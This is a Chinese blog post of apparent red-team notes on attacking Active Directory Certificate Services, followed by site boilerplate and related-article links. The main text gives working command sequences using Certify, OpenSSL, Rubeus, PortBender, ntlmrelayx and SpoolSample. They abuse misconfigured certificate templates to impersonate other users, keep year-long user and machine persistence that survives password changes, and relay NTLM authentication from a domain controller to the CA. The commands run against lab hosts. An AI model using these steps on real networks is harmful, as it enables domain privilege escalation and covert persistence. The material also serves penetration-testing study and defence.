ADCS渗透

最新推荐文章于 2024-06-19 14:30:11 发布
最新推荐文章于 2024-06-19 14:30:11 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 渗透 文章标签: 网络 安全 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18811919/article/details/127245791
版权
ADCS
活动目录证书服务(AD CS)是允许我们创建一个PKI的服务器角色,可以提供公钥加密,
数字证书,以及数字签名功能,一些实际应用有S/MIME,安全无无线网络,VPN,IPSEC,
加密文件系统(EFS),智能卡登录,以及SSL/TLS。
应用正确的话,ADCS可以改善一个组织的安全性:
1.通过加密确保机密性
2.通过数字签名确保完整性
3.通过将证书密钥与网络中的计算机,用户,或者设备账号联系以确保认证性。
不正确的ADCS配置可以导致特权提升,普通域管理甚至可以提升到域管理员以及持久化
寻找CA
为了寻找域或者域森林里的ADCS的CA,我们使用Certify工具,以及cas参数:execute-assembly certify.exe cas
https://github.com/GhostPack/Certify
输出包含根CA,注册CA等
其中证书链值得注意。
根CA:Root CAS
注册CA:Enterprise/Enrollment CAs
证书链:NTAuthCertificates
ADCS利用:配置不当的证书模板
微软提供的ADCS证书模板是分发证书的基点,它们为特定需求复制和配置,这些模板中的
错误配置可能会被利用以权限提升。
寻找配置不正确certify.exe find/vulnerable
利用步骤:
1.为域用户nglover申请证书:certify.exe request /ca:dc-1.cyberbotic.io\ca-1/template:VulnerableUserTemplate /altname:nglover
2.将整个证书包含私钥复制下来保存为cert.pem文件,然后使用openssl命令将其转换为pfx格式,我们可以添加一个密码或者留空:
openssl pkcs12-in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
3.将cert.pfx转换成base64编码后的字符串并使用rubeus asktgt使用该证书申请TGT
用户与主机持久化
ADCS不但可以被利用与提升特权,也可以用于维持对主机与用户的访问,如果证书的请求不需要管理批准,这尤其可行。
利用:
certify.exe find /clientauth 查找所有允许用户认证的证书
certify.exe request /ca:dc-2.dev.cyberbotic.io 请求ca证书
用户持久化:execute-assembly(cs内存加载.Net)certify.exe find /clientauth /ca:dc-2.dev.cyberbotic.io\ca-2
使用该模板申请证书:execute-assembly certify.exe request /ca:dc-2.dev.cyberbotics.io\ca-2\template:User
该证书允许我们为当前用户申请TGT,有效期是1年即便用户更改了密码,这是一个很好的实现用户持久化的方法,
因为不需要触碰lass且无需管理员特权。除非CA吊销了该证书。
主机持久化
与用户持久化并非完全不同,因为主机实际上是AD里特殊的用户类型,并且可以给自身申请证书,主机
证书模拟叫Machine,有效期1年不需要授权,每个主机都有注册权。
certify.exe request /ca:dc-2.dev.cyberbotic.io\ca-2/template:Machine/machine
/machine参数告诉certify自动提升至SYSTEM权限,并且身份为主机账号,因此需要管理员特权下运行。
ADCS NTLM 中继
ADCS服务支持HTTP的注册方法,甚至包含GUI,终端通常在http[s]://hostname/certs,并且默认支持HTLM认证方式
在默认配置下,这些终端会遭到NTLM中继攻击,通常的利用方式是强制DC向攻击者控制的地方认证,将请求中继给
CA并且获取DC的证书,然后用证书获取TGT。
工具:SharpSystemTriggers(https://github.com/cube0x0/SharpSystemTriggers)同PrintSpoofer一样,
包含其他远程认证方式。
使用:
需要注意的是,请求不能被中继至自身。这里,CA运行在DC-1,意味着我们不能将请求中继至DC-1然后获取DC-1的证书
1.使用PortBender重定向SMB流量至8445端口
2.使用逆向端口转发将8445端口流量转发到TS的445端口
3.开启SOCKS代理,使用ntlmrelayx将流量返还至网络
PortBender redirect 445 8445
工具下载:https://github.com/praetorian-inc/PortBender
rportfwd 8445 127.0.0.1 445
socks 1080
proxychains ntlmrelayx.py -t http://10.10.15.75/certsrv/certfnsh.asp -smb2support --adcs --no- http-server
spoolsample.exe 10.10.15.254 10.10.17.25 发起强制认证
工具下载:https://github.com/leechristensen/SpoolSample
虚构之人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
内网渗透(八十五)之ADCS证书服务攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-28 1125
2021年6月17日,国外安全研究员 Will Schroeder 和 Lee Christensen 共同发布了针对ADCS(Active Directory Certificate Service, 活动目录证书服务)的攻击手法。同年8月5日,在Black Hat 2021上 Will Schroeder 和 Lee CHristensen 对该攻击手法进行了详细讲解。至此,ADCS攻击第一次进入人们的视野。
ADCS攻击利用
slash_HK的博客
12-23 4802
一万字呕心沥血,全站最详细ADCS攻击利用方法及细节复现,包括服务器配置等,细节满满,支持走一波,也欢迎各位师傅斧正。
渗透笔记-ADCS 域提权-ESC4
NoooEmotion的博客
02-06 924
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。
春秋云镜-Certify-Writeup
qq_35607078的博客
07-12 272
春秋云镜-Certify-Writeup
渗透测试 | 详解ADCS证书服务攻击手法
最新发布
2401_85023531的博客
06-19 913
2021年6月17日,国外安全研究员 Will Schroeder 和 Lee Christensen 共同发布了针对ADCS(Active Directory Certificate Service, 活动目录证书服务)的攻击手法。同年8月5日,在Black Hat 2021上 Will Schroeder 和 Lee CHristensen 对该攻击手法进行了详细讲解。至此,ADCS攻击第一次进入人们的视野。
ADCS在内网渗透中的应用
hackzkaq的博客
11-07 230
在打攻防演练的时候有时候运气比较好的话会碰到部署了证书服务(AD CS)的内网环境,由于证书服务发布的部分证书可用于Kerberos认证并且在返回的PAC里面能拿到NTLM Hash,由此我们可以进行以下类型的内网攻击尝试身份认证:当我们拿到目标主机的权限后,我们可以在本地检索是否存在相关的证书并用该证书进行域内身份认证权限维持:当我们拿到用户的凭据后,我们可以申请一个证书,由于证书可用于Kerberos认证,所以即便后期用户更改密码,只有证书在手就可以随时拿到NTLM Hash。
渗透笔记-ADCS 域提权-ESC2
NoooEmotion的博客
02-03 456
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。
探索安全边界:Certify,Active Directory证书服务的利器
gitblog_00064的博客
05-09 412
探索安全边界:Certify,Active Directory证书服务的利器 项目地址:https://gitcode.com/GhostPack/Certify网络安全领域中,发现并利用系统的配置错误是常见的攻击手法。对于Active Directory Certificate Services(AD CS)而言,也不例外。今天,我们要向您推荐一款强大的C#工具——Certify,它专用于枚...
adcs7476.zip
01-12
ADCS7476——高精度模拟数字转换器的深度解析》 在现代电子设备中,模拟数字转换器(ADC)是不可或缺的关键组件之一,它负责将连续的模拟信号转化为离散的数字信号,使得计算机能够处理这些信号。本文将深入探讨...
Interfacing to High Speed ADCs via SPI
07-31
### Interfacing to High Speed ADCs via SPI #### 引言 在当今高速信号处理领域,高精度且快速的数据采集成为关键。模数转换器(Analog-to-Digital Converters, ADCs)作为连接模拟世界与数字世界的桥梁,其性能...
Synchronizing-Multiple-ADCs-Using-JESD204B_cn.pdf
08-13
"Synchronizing-Multiple-ADCs-Using-JESD204B_cn.pdf" 本文档主要介绍了如何使用JESD204B高速串行接口同步多个ADC器件的方法。该方法可以应用于许多通信、仪器仪表和信号采集系统中,满足低电压数字信号(LVDS)和...
Certify The Web(ssl证书管理器)5.0.12.exe
08-21
Certify The Web 是一款专业好用的IIS的免费 ssl证书管理器 ,由Let's Encrypt提供支持,又叫Certify SSL Manager,能帮助广大站长全自动从letsencrypt.org轻松申请、安装并自动续订IIS/Windows服务器的免费SSL/TLS证书,让各位站长设置https从未如此简单高效,Certify The Web是收费软件,不过免费版本能管理5个域名,已经能够满足大部分站长的需求了,如果需要管理更多域名请大家购买专业版本的Certify The Web。
certify
03-22
如果证书未按预期更新 假设您使用postal启动了容器,并且您是docker组的成员,请通过运行以下命令输入容器 postal enter certbot 要快速检查证书的到期日期,请运行 certbot certificates 在容器内,“让我们加密”数据存储在/etc/letsencrypt的标准位置。如果证书是最新的但尚未部署到Heroku,则可以使用Heroku CLI手动更新它们。例如,给定一个证书名称mycert和一个名为myapp的应用程序 cd /etc/letsencrypt/live/mycert $heroku certs:update -a myapp --confirm myapp fullchain.pem privkey.pem
3ADCs_DMA.rar
12-24
标题中的“3ADCs_DMA.rar”表明这是一份与微控制器(Microcontroller Unit, MCU)中的模拟数字转换器(Analog-to-Digital Converter, ADC)有关的资源,特别是关于使用直接存储器访问(Direct Memory Access, DMA)...
基于verilog的adcs7476程序
06-16
用verilog实现的adcs7476双路ad检测的文件,很好用
推荐一款实用工具:Certify - 简易证书管理与自动化签署解决方案
gitblog_00063的博客
04-18 436
推荐一款实用工具:Certify - 简易证书管理与自动化签署解决方案 certifyAutomatic client and server certificate distribution and maintenance项目地址:https://gitcode.com/gh_mirrors/cert/certify 项目简介 是一个由 Johan Brandhorst 开发的开源项目,它提供了...
Windows IIS配置Https免费证书的最简单方法(借助Certify
weixin_43645811的博客
06-09 5723
免费的SSL证书
渗透笔记-ADCS 域提权-ESC1
NoooEmotion的博客
02-02 1626
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。
内网小总结
2201_75378806的博客
05-11 952
本篇基于crto内容总结cs可以生成的listern有还有个pivot listener只能在现有的信标上创建,且负载类型是,而不是可以利用dnscan.py收集子域名,spoofy用于验证给定域的电子邮件安全密码喷射可以用mailsniper.ps1,利用namemash.py将获取一个人的全名并将其转换为可能的用户名排列密码喷射后登入邮件系统,现在要发送钓鱼邮件获取其它用户权限1.网络钓鱼宏注入2.远程模板注入3.html走私钓鱼成功上线后cs上线先进行主机观察:1.ps看进程。
adcs8162的三态是指什么
01-10
adcs8162的三态是指该器件的输入和输出信号可以分为三种状态:高电平、低电平和高阻态。高电平表示逻辑值"1",低电平表示逻辑值"0",而高阻态表示输入端和输出端之间呈现高阻状态,不会传输信号。 在实际应用中,adcs8162的三态可以用来实现多路选择器、数据总线和控制信号等多种功能。通过控制输入端的状态,可以选择不同的输出信号,实现数据的选择和传输。另外,高阻态也可以用于避免信号干扰和冲突,提高电路的稳定性和可靠性。 总的来说,adcs8162的三态功能为数字电路的设计和应用提供了更多的灵活性和可塑性,可以满足不同的信号处理需求,提升系统性能和工作效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值